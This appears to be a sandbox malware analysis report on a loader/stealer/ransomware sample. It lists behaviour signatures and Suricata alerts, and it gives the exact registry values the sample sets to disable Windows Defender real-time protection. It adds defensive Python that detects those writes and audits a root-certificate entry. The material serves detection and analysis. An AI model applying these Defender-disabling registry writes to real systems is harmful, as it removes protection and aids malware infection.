Malware Analysis Report

2024-10-19 02:08

Sample ID 220705-m3l6rsgdeq
Target faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.7z
SHA256 fc3e5b6b9d97afe0e0ad865e5b625c20b2fbf65bef4c46213b9abf941798303d
Tags
privateloader redline vidar 1448 222 argynpenisx2 mount2 ruzkii evasion infostealer loader main pyinstaller spyware stealer suricata trojan upx amadey colibri djvu glupteba 937 lyla28.06 collection discovery dropper persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fc3e5b6b9d97afe0e0ad865e5b625c20b2fbf65bef4c46213b9abf941798303d

Threat Level: Known bad

The file faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.7z was found to be: Known bad.

Malicious Activity Summary


Modifies Windows Defender Real-time Protection settings

suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

suricata: ET MALWARE Win32/Colibri Loader Activity M2

suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

Djvu Ransomware

PrivateLoader

suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download

suricata: ET MALWARE Amadey CnC Check-In

Modifies visibility of hidden/system files in Explorer

Glupteba

Modifies visibility of file extensions in Explorer

Process spawned unexpected child process

suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

RedLine Payload

suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved

suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload

suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer

suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Amadey

Colibri Loader

suricata: ET MALWARE Win32/Colibri Loader Activity M3

suricata: ET MALWARE Win32/Colibri Loader Activity

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

suricata: ET MALWARE Generic gate .php GET with minimal headers

Detected Djvu ransomware

suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key

Vidar

Vidar Stealer

Blocklisted process makes network request

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

UPX packed file

Reads user/profile data of web browsers

Checks computer location settings

Reads local data of messenger clients

Uses the VBS compiler for execution

Reads user/profile data of local email clients

Checks BIOS information in registry

Loads dropped DLL

Modifies file permissions

Adds Run key to start application

Accesses 2FA software files, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Checks installed software on the system

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Detects Pyinstaller

Enumerates physical storage devices

Program crash

Modifies system certificate store

Script User-Agent

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious behavior: AddClipboardFormatListener

Runs ping.exe

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

outlook_win_path

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

Suspicious use of SendNotifyMessage

Kills process with taskkill

Modifies registry class

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-07-05 10:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-07-05 10:59

Reported

2022-07-05 11:06

Platform

win7-20220414-en

Max time kernel

157s

Max time network

393s

Command Line

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
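The six "Set value" rows above are policy writes under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, each switching off one part of real-time protection; on the Windows 7 image used for this detonation they are plain registry writes with nothing protecting them. The following is an added example, not code from the report or from the sandbox vendor, that parses rows in this table's format and maps each write to the protection it disables. The row regex, the value-to-meaning table and the two extra rows (a "Key created" row the parser must skip and a value of 0 written by gpupdate.exe, which must not be flagged) are assumptions made for illustration; the six real rows are rebuilt from the table above.

```python
import re

DEFENDER_RTP_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"

# Policy values the sample sets to 1, and the protection each one switches off.
DEFENDER_RTP_VALUES = {
    "DisableRealtimeMonitoring": "real-time protection as a whole",
    "DisableBehaviorMonitoring": "behaviour monitoring",
    "DisableOnAccessProtection": "on-access (open/execute) file scanning",
    "DisableIOAVProtection": "scanning of downloaded files and attachments",
    "DisableScanOnRealtimeEnable": "catch-up scan when real-time protection is re-enabled",
    "DisableRawWriteNotification": "raw volume write notifications to the engine",
}

# One report row: Set value (<type>) <key>\<name> = "<value>" <process> <target>
SET_VALUE_RE = re.compile(
    r'^Set value \((?P<type>\w+)\) (?P<path>.+?) = "(?P<value>[^"]*)" (?P<process>.+?) (?P<target>\S+)$'
)

SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
ROW = r"Set value (int) " + DEFENDER_RTP_KEY + r'\%s = "%s" %s N/A'

# Rebuilt from the six rows in the table above, plus two constructed rows: a "Key created"
# row that the parser must skip and a value of 0 written by gpupdate.exe that must not be flagged.
REPORT_ROWS = (
    ["Key created " + DEFENDER_RTP_KEY + " " + SAMPLE_EXE + " N/A"]
    + [ROW % (name, "1", SAMPLE_EXE) for name in DEFENDER_RTP_VALUES]
    + [ROW % ("DisableRealtimeMonitoring", "0", r"C:\Windows\System32\gpupdate.exe")]
)


def parse_set_value_rows(rows):
    """Return one dict per 'Set value' row; 'Key created' and other row types are ignored."""
    events = []
    for row in rows:
        m = SET_VALUE_RE.match(row.strip())
        if not m:
            continue
        key, _, name = m["path"].rpartition("\\")
        events.append({"key": key, "name": name, "type": m["type"],
                       "value": m["value"], "process": m["process"]})
    return events


def defender_tamper_findings(events):
    """Return (process, value name, protection disabled) for every RTP policy write set to 1."""
    findings = []
    for ev in events:
        if ev["key"].lower() != DEFENDER_RTP_KEY.lower():
            continue
        meaning = DEFENDER_RTP_VALUES.get(ev["name"])
        if meaning and ev["value"] == "1":
            findings.append((ev["process"], ev["name"], meaning))
    return findings


if __name__ == "__main__":
    for proc, name, meaning in defender_tamper_findings(parse_set_value_rows(REPORT_ROWS)):
        print(f"{proc} disabled {meaning} ({name}=1)")
```

On a live host the same state is visible with reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" or Get-MpPreference; a non-empty Policies\...\Real-Time Protection key on a machine that is not domain-managed is itself worth an alert, since nothing legitimate writes there outside Group Policy.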

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

suricata

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

suricata

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21
542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
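Before treating this "Modifies system certificate store" hit as a rogue CA, decode what was written. The key name CABD2A79A1076A31F21D253635CB039D4329A5E8 is the published SHA-1 fingerprint of ISRG Root X1 (Let's Encrypt's root), and the DER inside the blob carries the strings "Internet Security Research Group" and "ISRG Root X1" (the hex runs 496e7465726e6574... and 4953524720526f6f74205831 above). That is consistent with Windows' automatic root-certificate update installing a public root after the sample made a TLS connection that chained to it, attributed to the sample because it triggered the download, rather than with a malicious root being injected. The blob is the store's serialised certificate: repeated records of uint32 property ID, uint32 reserved (always 1), uint32 length, data; the one above starts with property 4 (MD5 hash), 20 (key identifier), 3 (SHA-1 hash) and ends with property 32, the DER certificate itself, 0x56f bytes long. The following is an added example, not code from the report, that parses that format and cross-checks the key name against the stored hash and the certificate. The first three records are copied from the blob above; the five-byte "certificate" used for the round trip is a constructed placeholder, not a real certificate, and the property-name table covers only the IDs present on this page.

```python
import hashlib
import struct

# wincrypt.h CERT_*_PROP_ID values for the properties present in the page's blob
PROP_NAMES = {
    3: "CERT_SHA1_HASH_PROP_ID",
    4: "CERT_MD5_HASH_PROP_ID",
    15: "CERT_SIGNATURE_HASH_PROP_ID",
    20: "CERT_KEY_IDENTIFIER_PROP_ID",
    25: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    32: "CERT_CERT_PROP_ID",
}
CERT_SHA1_HASH_PROP_ID = 3
CERT_CERT_PROP_ID = 32

# First three property records of the Blob value in the table above (MD5 hash, key
# identifier, SHA-1 hash), copied from the report; the rest of the blob is omitted here.
PAGE_BLOB_PREFIX = bytes.fromhex(
    "040000000100000010000000" "0cd2f9e0da1773e9ed864da5e370e74e"
    "140000000100000014000000" "79b459e67bb6e5e40173800888c81a58f6e99b6e"
    "030000000100000014000000" "cabd2a79a1076a31f21d253635cb039d4329a5e8"
)
PAGE_KEY_NAME = "CABD2A79A1076A31F21D253635CB039D4329A5E8"


def parse_cert_blob(blob):
    """Walk the serialised certificate: (uint32 prop_id, uint32 reserved=1, uint32 length, data)*."""
    props = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError("truncated property header at offset %d" % off)
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError("malformed property %d at offset %d" % (prop_id, off - 12))
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def thumbprint(der):
    """SHA-1 of the DER encoding, which is what the registry key under Certificates\\ is named after."""
    return hashlib.sha1(der).hexdigest()


def build_cert_blob(der):
    """Serialise a certificate the way the store does: hash property first, encoded cert last."""
    records = [(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(der).digest()), (CERT_CERT_PROP_ID, der)]
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in records)


def audit_root_entry(key_name, blob):
    """Cross-check a ROOT\\Certificates\\<thumbprint> key against the contents of its Blob value."""
    props = parse_cert_blob(blob)
    want = key_name.lower()
    report = {
        "properties": [PROP_NAMES.get(p, "prop_%d" % p) for p in props],
        "key_matches_sha1_prop": props.get(CERT_SHA1_HASH_PROP_ID, b"").hex() == want,
    }
    der = props.get(CERT_CERT_PROP_ID)
    if der is not None:
        report["der_sha1_matches_key"] = thumbprint(der) == want
        # Crude subject check: the CN is stored as a contiguous PrintableString inside the DER.
        report["is_isrg_root_x1"] = b"ISRG Root X1" in der
    return report


if __name__ == "__main__":
    print(audit_root_entry(PAGE_KEY_NAME, PAGE_BLOB_PREFIX))
    fake_der = bytes.fromhex("3003020101")  # constructed placeholder, not a real certificate
    print(audit_root_entry(thumbprint(fake_der), build_cert_blob(fake_der)))
```

On a real entry the check that matters is the last one: the SHA-1 of property 32 must equal both the key name and property 3, and the subject must be a root you expect. A blob whose key name does not match the certificate it contains, or whose subject is unknown, is the case that deserves the "system certificate store" severity; this one does not.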

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 2024 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
